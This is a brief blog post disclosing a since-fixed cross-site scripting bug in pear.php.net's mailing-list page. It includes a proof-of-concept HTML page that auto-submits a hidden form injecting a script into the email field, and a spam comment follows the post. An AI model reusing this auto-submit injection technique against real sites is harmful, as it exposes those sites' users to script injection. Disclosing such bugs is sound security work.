Monday, April 21, 2014

pear.php.net XSS

Long time ago (28.06.2013) I found XSS bug in http://pear.php.net/support/lists.php. Email parameter was neither validated nor sanitized which resulted in XSS. Proof of concept was:
<head>
    <script src="http://code.jquery.com/jquery-1.10.1.min.js"></script>
</head>

<body> 
    <form method="post" action="http://pear.php.net/support/lists.php" id="form" style="display:none">
    <input name="maillist[pear-dev]" type="radio" value="normal" checked>
    <input type="text" name="email" size="30" value="<script>alert('xss');</script>">
    <input type="submit" name="action" value="Subscribe">
    </form>
</body>
 
<script>
     $('input[name=action]').click();
</script>
Fixed 08.07.2013.

1 comment:

  1. Tamiloneindia is an international online retailer in video games and the preferred choice of millions of gamers across the globe. Download the most recent and best PC games using Tamil One India - get the lowest prices, incredible bundles, and exclusive deals. All that is updated regularly.

    ReplyDelete